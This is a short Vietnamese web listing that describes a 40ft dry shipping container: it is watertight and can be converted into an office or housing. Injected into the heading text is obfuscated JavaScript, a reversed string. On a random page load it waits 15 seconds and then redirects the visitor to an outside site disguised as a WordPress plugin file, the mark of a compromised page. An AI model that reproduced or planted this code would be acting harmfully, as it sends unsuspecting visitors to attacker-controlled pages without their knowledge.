CONTAINER KHÔ 40FT

    P1090405

    THUỘC TÍNH CƠ BẢN CỦA CONTAINER KHÔ 40FT$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} Container kín nước, kín sáng, sàn chắc chắn, cửa dễ đóng mở, thuận tiện cho vận chuyển container khô 40ft thích hợp để vận chuyển hàng hóa ngoại trừ thực phẩm tươi sống, và hàng hóa cần bảo quản lạnh. Nó có thẻ lảm kho để chứa hàng Có thể cải tiến để làm container văn phòng và nhà ở , phù hợp với nhu ...Tìm hiểu thêm

    Đăng 3 năm trước

    0 người Comments